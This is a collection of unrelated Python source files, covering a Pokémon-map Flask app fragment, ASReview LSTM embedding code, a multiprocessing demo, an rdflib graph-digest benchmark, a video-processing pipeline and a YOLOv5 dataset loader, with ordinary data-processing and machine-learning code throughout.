if gym[0] == 2:
color = "rgba(240, 68, 58, .6)"
if gym[0] == 3:
color = "rgba(254, 217, 40, .6)"
icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
pokeMarkers.append({
'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
'type': 'gym',
'key': gym_key,
'disappear_time': -1,
'lat': gym[1],
'lng': gym[2],
'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
})
for stop_key in pokestops:
stop = pokestops[stop_key]
if stop[2] > 0:
pokeMarkers.append({
'type': 'lured_stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/PstopLured.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Lured Pokestop, expires at ' + stop[2],
})
else:
pokeMarkers.append({
'type': 'stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/Pstop.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Pokestop',
})
return pokeMarkers
def get_map():
fullmap = Map(
identifier="fullmap2",
style='height:100%;width:100%;top:0;left:0;position:absolute;z-index:200;',
lat=origin_lat,
lng=origin_lon,
markers=get_pokemarkers(),
zoom='15', )
return fullmap
if __name__ == '__main__':
args = get_args()
register_background_thread(initial_registration=True)
app.run(debug=True, threaded=True, host=args.host, port=args.port)
|
embedding_lstm.py
|
# Copyright 2019 The ASReview Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gzip
import io
import logging
from multiprocessing import cpu_count
from multiprocessing import Process
from multiprocessing import Queue
from pathlib import Path
from urllib.request import urlopen
import time
import numpy as np
from asreview.utils import get_data_home
from asreview.feature_extraction.base import BaseFeatureExtraction
try:
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
except ImportError:
TF_AVAILABLE = False
else:
TF_AVAILABLE = True
def _check_tensorflow():
if not TF_AVAILABLE:
raise ImportError(
"Install tensorflow package (`pip install tensorflow`) to use"
" 'EmbeddingLSTM'.")
class EmbeddingLSTM(BaseFeatureExtraction):
"""Class to create embedding matrices for LSTM models.
Feature extraction method for :class:`asreview.models.LSTMBaseModel` and
:class:`asreview.models.LSTMPoolModel` models.
.. note::
This feature extraction algorithm requires ``tensorflow`` to be
installed. Use ``pip install tensorflow`` or install all optional
ASReview dependencies with ``pip install asreview[all]``
Arguments
---------
loop_sequence: bool
Instead of zeros at the start/end of sequence loop it.
num_words: int
Maximum number of unique words to be processed.
max_sequence_length: int
Maximum length of the sequence. Longer sequences are truncated.
Shorter sequences are either padded with zeros or looped.
padding: str
Which side should be padded [pre/post].
truncating:
Which side should be truncated [pre/post].
n_jobs:
Number of processors used in reading the embedding matrix.
"""
name = "embedding-lstm"
def __init__(self,
*args,
loop_sequence=1,
num_words=20000,
max_sequence_length=1000,
padding='post',
truncating='post',
n_jobs=1,
**kwargs):
"""Initialize the embedding matrix feature extraction."""
super(EmbeddingLSTM, self).__init__(*args, **kwargs)
self.embedding = None
self.num_words = num_words
self.max_sequence_length = max_sequence_length
self.padding = padding
self.truncating = truncating
self.n_jobs = n_jobs
self.loop_sequence = loop_sequence
def transform(self, texts):
_check_tensorflow()
self.X, self.word_index = text_to_features(
texts,
loop_sequence=self.loop_sequence,
num_words=self.num_words,
max_sequence_length=self.max_sequence_length,
padding=self.padding,
truncating=self.truncating)
return self.X
def get_embedding_matrix(self, texts, embedding_fp):
_check_tensorflow()
self.fit_transform(texts)
if embedding_fp is None:
embedding_fp = Path(get_data_home(),
EMBEDDING_EN["name"]).expanduser()
if not embedding_fp.exists():
logging.warning("Warning: will start to download large "
"embedding file in 10 seconds.")
time.sleep(10)
download_embedding()
logging.info("Loading embedding matrix. "
"This can take several minutes.")
embedding = load_embedding(embedding_fp, n_jobs=self.n_jobs)
embedding_matrix = sample_embedding(embedding, self.word_index)
return embedding_matrix
def full_hyper_space(self):
from hyperopt import hp
hyper_space, hyper_choices = super(EmbeddingLSTM,
self).full_hyper_space()
hyper_space.update(
{"fex_loop_sequences": hp.randint("fex_loop_sequences", 2)})
return hyper_space, hyper_choices
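# --- Hedged usage sketch (editor's addition; the texts below are made up) ---
# transform() tokenizes the texts and pads/loops them to max_sequence_length;
# get_embedding_matrix() then maps the resulting word_index onto pretrained
# fastText vectors (downloading EMBEDDING_EN on first use):
#
#   fex = EmbeddingLSTM(num_words=20000, max_sequence_length=1000)
#   X = fex.transform(["first abstract text", "second abstract text"])  # shape (2, 1000)
#   matrix = fex.get_embedding_matrix(["first abstract text", "second abstract text"], None)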
EMBEDDING_EN = {
"url":
"https://dl.fbaipublicfiles.com/fasttext/vectors-crawl/cc.en.300.vec.gz", # noqa
"name": 'fasttext.cc.en.300.vec'
}
def loop_sequences(X, max_sequence_length=1000):
# Loop the sequences instead of padding.
for i, old_x in enumerate(X):
nz = max_sequence_length - 1
while nz >= 0 and old_x[nz] == 0:
nz -= 1
# If there are only 0's (no data), continue.
if nz < 0:
continue
nz += 1
new_x = old_x.copy()
j = 1
# Copy the old data to the new matrix.
while nz * j < max_sequence_length:
cp_len = min(nz * (j + 1), max_sequence_length) - nz * j
new_x[nz * j:nz * j + cp_len] = old_x[0:cp_len]
j += 1
X[i] = new_x
return X
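# --- Hedged worked example (editor's addition) ---
# With max_sequence_length=6, a post-padded row [3, 7, 0, 0, 0, 0] becomes
# [3, 7, 3, 7, 3, 7]: the non-zero prefix (length nz=2) is copied repeatedly
# until the row is full, instead of leaving trailing zeros.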
def text_to_features(sequences,
loop_sequence=1,
num_words=20000,
max_sequence_length=1000,
padding='post',
truncating='post'):
"""Convert text data into features.
Arguments
---------
sequences: list, numpy.ndarray, pandas.Series
The sequences to convert into features.
num_words: int
See keras Tokenizer
Returns
-------
np.ndarray, dict
The array with features and the dictionary that maps words to indices.
"""
# fit on texts
tokenizer = Tokenizer(num_words=num_words)
tokenizer.fit_on_texts(sequences)
# tokenize sequences
tokens = tokenizer.texts_to_sequences(sequences)
# Pad sequences with zeros.
x = pad_sequences(tokens,
maxlen=max_sequence_length,
padding=padding,
truncating=truncating)
if loop_sequence == 1:
x = loop_sequences(x, max_sequence_length)
# word index hack. see issue
# https://github.com/keras-team/keras/issues/8092
word_index = {
e: i
for e, i in tokenizer.word_index.items() if i <= num_words
}
return x, word_index
def _embedding_reader(filename, input_queue, block_size=1000):
""" Process that reads the word embeddings from a file.
Parameters
----------
filename: str
File of trained embedding vectors.
input_queue: Queue
Queue to store jobs in.
block_size: int
Number of lines for each job.
"""
with open(filename, 'r', encoding='utf-8', newline='\n') as f:
# Throw away the first line, since we don't care about the dimensions.
f.readline()
i_line = 0
buffer = []
# Read the embedding file line by line.
for line in f:
i_line += 1
buffer.append(line)
# If the buffer is full, write it to the queue.
if i_line == block_size:
input_queue.put(buffer)
i_line = 0
buffer = []
if i_line > 0:
input_queue.put(buffer)
# Put the string "DONE" in the queue, to ensure that the
# worker processes finish.
input_queue.put("DONE")
def _embedding_worker(input_queue, output_queue, emb_vec_dim, word_index=None):
""" Process that reads the word embeddings from a file.
Parameters
----------
input_queue: Queue
Queue in which the jobs are submitted.
output_queue: Queue
Queue to store the embedding in dictionary form.
emb_vec_dim: int
Dimension of each embedding vector.
word_index: dict
Dictionary of the sample embedding.
"""
bad_input = False
bad_values = {}
while True:
embedding = {}
buffer = input_queue.get()
if buffer == "DONE":
break
for line in buffer:
line = line.rstrip()
values = line.split(' ')
if len(values) != emb_vec_dim + 1:
if not bad_input:
print("Error: bad input in embedding vector.")
bad_input = True
bad_values = values
break
word = values[0]
if word_index is not None and word not in word_index:
continue
coefs = values[1:emb_vec_dim + 1]
# store the results
embedding[word] = np.asarray(coefs, dtype=np.float32)
output_queue.put(embedding)
# We removed the "DONE" from the input queue, so put it back in for
# the other processes.
input_queue.put("DONE")
# Store the results in the output queue
if bad_input:
output_queue.put({"ErrorBadInputValues": bad_values})
output_queue.put("DONE")
def _embedding_aggregator(output_queue, n_worker):
""" Process that aggregates the results of the workers.
This should be the main/original process.
Parameters
----------
output_queue: Queue
This queue is the output queue of the workers.
n_worker: int
The number of worker processes.
Returns
-------
Aggregated embedding dictionary.
"""
embedding = {}
num_done = 0
while num_done < n_worker:
new_embedding = output_queue.get()
if new_embedding == "DONE":
num_done += 1
else:
embedding.update(new_embedding)
return embedding
def download_embedding(url=EMBEDDING_EN['url'],
name=EMBEDDING_EN['name'],
data_home=None):
"""Download word embedding file.
Download word embedding file, unzip the file and save to the
file system.
Parameters
----------
url: str
The URL of the gzipped word embedding file
name: str
The filename of the embedding file.
data_home: str
The location of the ASR datasets.
Default `asreview.utils.get_data_home()`
"""
if data_home is None:
data_home = get_data_home()
out_fp = Path(data_home, name)
logging.info(f'Start downloading: {url}')
r = urlopen(url)
compressed_file = io.BytesIO(r.read())
logging.info(f'Save embedding to {out_fp}')
decompressed_file = gzip.GzipFile(fileobj=compressed_file)
with open(out_fp, 'wb') as out_file:
for line in decompressed_file:
out_file.write(line)
def load_embedding(fp, word_index=None, n_jobs=None):
"""Load embedding matrix from file.
The embedding matrix needs to be stored in the
FastText format.
Parameters
----------
fp: str
File path of the trained embedding vectors.
word_index: dict
Sample word embeddings.
n_jobs: int
Number of processes to parse the embedding (+1 process for reading).
Returns
-------
dict:
The embedding weights stored in a dict with the word as key and
the weights as values.
"""
# Maximum number of jobs in the queue.
queue_size = 500
# Set the number of reader processes to use.
if n_jobs is None:
n_jobs = 1
elif n_jobs == -1:
n_jobs = cpu_count() - 1
input_queue = Queue(queue_size)
output_queue = Queue()
with open(fp, 'r', encoding='utf-8', newline='\n') as f:
n_words, emb_vec_dim = list(map(int, f.readline().split(' ')))
logging.debug(f"Reading {n_words} vectors with {emb_vec_dim} dimensions.")
worker_procs = []
p = Process(target=_embedding_reader, args=(fp, input_queue), daemon=True)
worker_procs.append(p)
for _ in range(n_jobs):
p = Process(target=_embedding_worker,
args=(input_queue, output_queue, emb_vec_dim, word_index),
daemon=True)
worker_procs.append(p)
# Start workers.
for proc in worker_procs:
proc.start()
embedding = _embedding_aggregator(output_queue, n_jobs)
# Merge dictionaries of workers
# Join workers
for proc in worker_procs:
proc.join()
if "ErrorBadInputValues" in embedding:
bad_values = embedding["ErrorBadInputValues"]
raise ValueError(f"Check embedding matrix, bad format: {bad_values}")
logging.debug(f"Found {len(embedding)} word vectors.")
return embedding
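# --- Hedged usage sketch (editor's addition; the file name is an assumption) ---
# load_embedding() streams a FastText-format .vec file through one reader
# process plus n_jobs parser processes; sample_embedding() (below) then keeps
# only the rows present in the tokenizer's word_index:
#
#   embedding = load_embedding("cc.en.300.vec", word_index=word_index, n_jobs=-1)
#   matrix = sample_embedding(embedding, word_index)  # shape: (len(word_index) + 1, 300)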
def sample_embedding(embedding, word_index):
"""Sample embedding matrix
Parameters
----------
embedding: dict
A dictionary with the words and embedding vectors.
word_index: dict
A word_index like the output of Keras Tokenizer.word_index.
Returns
-------
np.ndarray:
The embedding weights stored in a two-dimensional numpy array,
where row i holds the vector for the word with index i in word_index.
"""
n_words, emb_vec_dim = len(word_index), len(next(iter(embedding.values())))
logging.debug(f"Creating matrix with {n_words} vectors "
f"with dimension {emb_vec_dim}.")
# n+1 because 0 is preserved in the tokenizing process.
embedding_matrix = np.zeros((n_words + 1, emb_vec_dim))
for word, i in word_index.items():
coefs = embedding.get(word)
if coefs is not None:
embedding_matrix[i] = coefs
logging.debug(f'Shape of embedding matrix: {embedding_matrix.shape}')
return embedding_matrix
|
multiprocess_test.py
|
from multiprocessing import Process, Lock
from multiprocessing.sharedctypes import Value, Array
from ctypes import Structure, c_double
import numpy as np
import ctypes
class Point(Structure):
_fields_ = [('x', c_double), ('y', c_double)]
# _fields_ = np.array([[1.875,-6.25], [-5.75,2.0], [2.375,9.5]])
def modify(n, x, s, A):
n.value **= 2
x.value **= 2
s.value = s.value.upper()
for a in A:
a.x **= 2
a.y **= 2
if __name__ == '__main__':
lock = Lock()
n = Value('i', 7)
x = Value(c_double, 1.0/3.0, lock=False)
s = Array('c', b'hello world', lock=lock)
arr = np.array([(1.875, -6.25), (-5.75, 2.0), (2.375, 9.5)])
print(arr.shape)
tup = tuple(map(tuple, arr))
A = Array(Point, tup, lock=lock)
p = Process(target=modify, args=(n, x, s, A))
p.start()
p.join()
print(n.value)
print(x.value)
print(s.value)
print([(a.x, a.y) for a in A])
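# --- Hedged note (editor's addition) ---
# Expected output of the demo above: the child process squares the shared
# values in place, so the parent prints roughly
#   49
#   0.1111111111111111
#   b'HELLO WORLD'            (plain 'HELLO WORLD' on Python 2)
#   [(3.515625, 39.0625), (33.0625, 4.0), (5.640625, 90.25)]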
# # import multiprocessing
# import time
# from multiprocessing import Process, Value, Array
# class A():
# def __init__(self):
# pass
# def f(self,n, a):
# for bb in range(100):
# n.value = 3.1415927 + bb
# time.sleep(.1)
# for i in range(len(a)):
# a[i] = -a[i]
# def run(self):
# self.num = Value('d', 0.0)
# self.arr = Array('i', range(10))
# self.p = Process(target=self.f, args=(self.num, self.arr))
# self.p.start()
# if __name__ == '__main__':
# myA = A()
# myA.run()
# for i in range(10):
# print(myA.num.value)
# print(myA.arr[:])
# time.sleep(1)
# def worker(procnum, return_dict):
# """worker function"""
# time.sleep(procnum)
# print(str(procnum) + " represent!")
# return_dict[procnum] = procnum
# if __name__ == "__main__":
# manager = multiprocessing.Manager()
# return_dict = manager.dict()
# jobs = []
# for i in range(5):
# p = multiprocessing.Process(target=worker, args=(i, return_dict))
# jobs.append(p)
# p.start()
# for proc in jobs:
# proc.join()
# print(return_dict.values())
# # time.sleep(1)
#
# class A(object):
# def __init__(self, *args, **kwargs):
# # do other stuff
# self.starttime = time.time()
# self.time = self.starttime
# self.manager = multiprocessing.Manager()
# self.return_dict = self.manager.dict()
# def do_something(self, i,thetime):
# for i in range(1000):
# thetime = time.time() - self.starttime
# time.sleep(0.01)
# # print('%s * %s = %s' % (i, i, i*i))
# def run(self):
# processes = []
# # for i in range(10):
# thetime = 0
# p = multiprocessing.Process(target=self.do_something, args=(5,thetime))
# p.start()
# # processes.append(p)
# # [x.start() for x in processes]
# if __name__ == '__main__':
# a = A()
# a.run()
# print('post run')
# for i in range(10):
# print(a.time)
# time.sleep(1)
|
graph_digest_benchmark.py
|
#!/usr/bin/env python
'''
This benchmark will produce graph digests for all of the
downloadable ontologies available in Bioportal.
'''
from __future__ import print_function
from rdflib import Namespace, Graph
from rdflib.compare import to_isomorphic
from six.moves.urllib.request import urlopen
from six.moves import queue
import sys, csv
from io import StringIO
from collections import defaultdict
from multiprocessing import Process, Semaphore, Queue
bioportal_query = '''
PREFIX metadata: <http://data.bioontology.org/metadata/>
select distinct ?ontology ?title ?download where {
?ontology a metadata:Ontology;
metadata:omvname ?title;
metadata:links ?links.
?links metadata:Ontology ?download.
filter(regex(?download, "/download"))
}
'''
stat_cols = [
'id',
'ontology',
'download_url',
'tree_depth',
'color_count',
'individuations',
'prunings',
'initial_color_count',
'adjacent_nodes',
'initial_coloring_runtime',
'triple_count',
'graph_digest',
'to_hash_runtime',
'canonicalize_triples_runtime',
'error',
]
def files_benchmark(ontologies, output_file, threads):
w = open(output_file, 'w')
writer = csv.DictWriter(w, stat_cols)
writer.writeheader()
tasks = Queue()
finished_tasks = Queue()
dl_lock = Semaphore(4)
task_count = len(ontologies)
def worker(q, finished_tasks, dl_lock):
try:
while True:
stats = q.get()
og = Graph()
try:
og.load(stats['download_url'])
print(stats['ontology'], stats['id'])
ig = to_isomorphic(og)
graph_digest = ig.graph_digest(stats)
finished_tasks.put(stats)
except Exception as e:
print('ERROR', stats['id'], e)
stats['error'] = str(e)
finished_tasks.put(stats)
except queue.Empty:
pass
for i in range(int(threads)):
print("Starting worker", i)
t = Process(target=worker, args=[tasks, finished_tasks, dl_lock])
t.daemon = True
t.start()
for download in ontologies:
stats = defaultdict(str)
stats.update({
"id": download.split("/")[-1].split(".")[0],
"ontology": download.split("/")[-1].split(".")[0],
"download_url": download
})
tasks.put(stats)
tasks.close()
written_tasks = 0
while written_tasks < task_count:
stats = finished_tasks.get()
# print "Writing", stats['ontology']
writer.writerow(stats)
w.flush()
written_tasks += 1
def bioportal_benchmark(apikey, output_file, threads):
metadata = Namespace("http://data.bioontology.org/metadata/")
url = 'http://data.bioontology.org/ontologies?apikey=%s' % apikey
ontology_graph = Graph()
print(url)
ontology_list_json = urlopen(url).read()
ontology_graph.parse(StringIO(ontology_list_json.decode('utf-8')), format="json-ld")
ontologies = ontology_graph.query(bioportal_query)
w = open(output_file, 'w')
writer = csv.DictWriter(w, stat_cols)
writer.writeheader()
tasks = Queue()
finished_tasks = Queue()
dl_lock = Semaphore(4)
task_count = len(ontologies)
def worker(q, finished_tasks, dl_lock):
try:
while True:
stats = q.get()
og = Graph()
try:
try:
dl_lock.acquire()
og.load(stats['download_url'] + "?apikey=%s" % apikey)
finally:
dl_lock.release()
print(stats['ontology'], stats['id'])
ig = to_isomorphic(og)
graph_digest = ig.graph_digest(stats)
finished_tasks.put(stats)
except Exception as e:
print('ERROR', stats['id'], e)
stats['error'] = str(e)
finished_tasks.put(stats)
except queue.Empty:
pass
for i in range(int(threads)):
print("Starting worker", i)
t = Process(target=worker, args=[tasks, finished_tasks, dl_lock])
t.daemon = True
t.start()
for ontology, title, download in ontologies:
stats = defaultdict(str)
stats.update({
"id": ontology,
"ontology": title,
"download_url": download
})
tasks.put(stats)
tasks.close()
written_tasks = 0
while written_tasks < task_count:
stats = finished_tasks.get()
# print "Writing", stats['ontology']
writer.writerow(stats)
w.flush()
written_tasks += 1
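# --- Hedged usage note (editor's addition) ---
# As written, the argument count decides the mode:
#   python graph_digest_benchmark.py APIKEY output.csv THREADS            # Bioportal crawl
#   python graph_digest_benchmark.py a.owl b.owl ... output.csv THREADS   # local files
# (file mode needs at least two ontology files, since it only triggers when
# more than four command-line arguments are given).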
if __name__ == '__main__':
if len(sys.argv) > 4:
files_benchmark(sys.argv[1:-2], sys.argv[-2], sys.argv[-1])
else:
bioportal_benchmark(sys.argv[1], sys.argv[2], sys.argv[3])
|
process.py
|
from random import uniform
import time
from threading import Thread, Lock
from queue import Queue
import Algorithmia
from src.utils import create_producer, create_consumer, credential_auth
from uuid import uuid4
import json
MAX_SECONDS = 120
class CheckableVariable(object):
def __init__(self, default_value):
self.queue = Queue(1)
self.queue.put(default_value)
self.lock = Lock()
def get(self):
with self.lock:
result = self.queue.get()
self.queue.put(result)
return result
def increment(self, value):
with self.lock:
result = self.queue.get()
self.queue.put(result + value)
def decrement(self, value):
with self.lock:
result = self.queue.get()
self.queue.put(result - value)
class PoolManger(object):
def __init__(self, min_pool, max_pool, increment_size):
self._current_count = CheckableVariable(min_pool)
self._max_count = CheckableVariable(max_pool)
self._unlock = Lock()
self._incr_size = increment_size
def max(self):
return self._max_count.get()
def current(self):
return self._current_count.get()
def acquire(self):
while True:
if not self._unlock.locked() and self.current() < self.max():
break
else:
time.sleep(uniform(0.1, 0.5))
self._unlock.acquire()
self._current_count.increment(1)
def release(self):
try:
self._unlock.release()
except RuntimeError:
pass
def update_max(self):
self._max_count.increment(self._incr_size)
def __enter__(self):
self.acquire()
def __exit__(self, exc_type, exc_val, exc_tb):
self.release()
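# --- Hedged usage sketch (editor's addition) ---
# PoolManger gates how many worker threads may run at once; acquire() spins
# until current() < max() and the internal lock is free, and update_max()
# raises the ceiling by increment_size:
#
#   locker = PoolManger(min_pool=0, max_pool=4, increment_size=2)
#   with locker:        # blocks until a slot is available
#       handle_one_job()
#   locker.update_max() # allow two more concurrent workers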
def wait_to_transform(client, logger, itr, next_input, next_output, fps, time_wait=5):
dataFile = client.file(next_input)
while True:
logger.info("process - {} - woke thread".format(itr))
if dataFile.exists():
break
else:
time.sleep(time_wait)
logger.info("process - {}- processing".format(itr))
result = transform(client, logger, next_input, next_output, fps)
logger.info("process - {} - processed".format(itr))
return result
def transform(client, logger, input_file, output_file, fps):
algo = "deeplearning/ObjectDetectionCOCO/0.3.x"
advanced_input = {
"images": "$BATCH_INPUT",
"outputs": "$BATCH_OUTPUT",
"model": "ssd_mobilenet_v1",
"minscore": "0.7"
}
input = {
"input_file": input_file,
"output_file": output_file,
"algorithm": algo,
"advanced_input": advanced_input,
"fps": fps,
}
try:
result = client.algo('media/videotransform?timeout=3000').pipe(input).result
return result['output_file']
except Exception as e:
logger.info(e)
return None
def process(logger, client, feeder_q, processed_q, thread_locker, remote_format, fps):
with thread_locker:
logger.info("process - {}/{} threads unlocked".format(str(thread_locker.current()), str(thread_locker.max())))
while True:
while feeder_q.empty():
time.sleep(0.25)
data = feeder_q.get()
itr = data['itr']
input_url = data['url']
remote_path = "{}/{}.mp4".format(remote_format, str(uuid4()))
algorithm_response = wait_to_transform(client, logger, itr, input_url, remote_path, fps, time_wait=1)
if algorithm_response:
data = {itr: algorithm_response}
logger.info("process - pushing {} to publishing queue..".format(itr))
processed_q.put(data)
else:
logger.info("process - skipping {} due to exception...".format(itr))
def consume(logger, aws_creds, work1_q, work2_q, input_stream):
session = credential_auth(aws_creds)
consumer = create_consumer(input_stream, session)
logger.info("input - starting to consume...")
for message in consumer:
work1_q.put(json.loads(message['Data']))
work2_q.put(json.loads(message['Data']))
logger.info("input - got message and queued")
def unlocker(thread_locker):
while True:
t = time.time()
while time.time() - t < 30:
time.sleep(0.25)
try:
thread_locker.release()
except:
pass
def publish(logger, aws_creds, output_stream, work_completed_queue, input_secondary_queue, thread_locker, fps):
session = credential_auth(aws_creds)
producer = create_producer(output_stream, session)
cutoff = None
videos_per_publish = int(MAX_SECONDS / fps)
buffer = {}
originals_buffer = {}
t = time.time()
logger.info("output - waiting {}s before starting publishing".format(str(MAX_SECONDS*2)))
while time.time() - t < MAX_SECONDS*2:
time.sleep(0.25)
t = time.time()
logger.info("output - starting publishing system...")
while True:
while work_completed_queue.empty() and input_secondary_queue.empty() and time.time() - t < MAX_SECONDS:
time.sleep(0.25)
transformed_indicies = list(buffer.keys())
if not input_secondary_queue.empty():
data = input_secondary_queue.get()
itr = data['itr']
if not cutoff:
cutoff = int(itr)
original_url = data['url']
originals_buffer[itr] = original_url
if not work_completed_queue.empty():
data = work_completed_queue.get()
key = list(data.keys())[0]
if int(key) >= cutoff:
buffer[key] = data[key]
logger.info("output - transformed - {} - {}".format(transformed_indicies, cutoff))
else:
logger.info("output - {} is not greater than current cursor, ignoring...".format(key))
if time.time() - t >= MAX_SECONDS:
logger.info("output - {} - {}".format(transformed_indicies, videos_per_publish))
transformed_indicies.sort()
shippable_buffer = []
increase_threads_signal = False
logger.info("output - pushing {}s of content to publishing buffer...".format(str(MAX_SECONDS)))
for i in range(cutoff, cutoff + videos_per_publish):
if i in transformed_indicies:
packaged = {"itr": i, "url": buffer[i], "type": "transform"}
del buffer[i]
elif i in originals_buffer:
packaged = {"itr": i, "url": originals_buffer[i], "type": "original"}
del originals_buffer[i]
else:
packaged = {'itr': i, "url": None, "type": None}
logger.info("output - packaging -{}".format(packaged))
shippable_buffer.append(packaged)
shippable_buffer = sorted(shippable_buffer, key=lambda k: k['itr'])
for next_item in shippable_buffer:
if next_item['type'] == "original":
increase_threads_signal = True
logger.info("output - shipping {}".format(next_item))
producer.put(json.dumps(next_item))
logger.info("output - finished publishing")
if increase_threads_signal:
thread_locker.update_max()
cutoff = cutoff + videos_per_publish
t = time.time()
class Logger:
def __init__(self):
self.q = Queue()
def info(self, message):
self.q.put(message)
def read_next(self):
next_message = self.q.get()
print(next_message, flush=True)
def processor(algorithmia_api_key, aws_creds, initial_pool, input_stream_name, output_stream_name,
data_collection, fps, algo_address=None):
logger = Logger()
if algo_address:
client = Algorithmia.client(algorithmia_api_key, api_address=algo_address)
else:
client = Algorithmia.client(algorithmia_api_key)
print("starting process", flush=True)
input1_q = Queue(500)
input2_q = Queue(500)
processed_q = Queue(500)
thread_locker = PoolManger(0, initial_pool, 2)
consume_t = [Thread(target=consume, args=(logger, aws_creds, input1_q, input2_q, input_stream_name))]
publish_t = [Thread(target=publish, args=(logger, aws_creds, output_stream_name, processed_q, input2_q, thread_locker, fps))]
unlocker_t = [Thread(target=unlocker, args=(thread_locker,))]
threads = [Thread(target=process, args=(logger, client, input1_q, processed_q, thread_locker, data_collection, fps)) for
_ in range(100)]
threads += consume_t + publish_t + unlocker_t
[thread.start() for thread in threads]
while True:
logger.read_next()
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from yolov5processor.utils.general import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8):
# Make sure only the first process in DDP processes the dataset first; the following others can then use the cache.
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
dataloader = InfiniteDataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers.
Uses same syntax as vanilla DataLoader.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', self._RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever.
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
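# --- Hedged note (editor's addition; the unpacking below assumes the usual
# (imgs, labels, paths, shapes) output of LoadImagesAndLabels.collate_fn) ---
# InfiniteDataLoader swaps its batch_sampler for _RepeatSampler so that worker
# processes are created once and reused across epochs instead of being torn
# down after every epoch, as a vanilla DataLoader would do:
#
#   loader, dataset = create_dataloader(path, imgsz=640, batch_size=16, stride=32, opt=opt)
#   for imgs, targets, paths, shapes in loader:
#       ...  # same iterator, persistent workers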
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
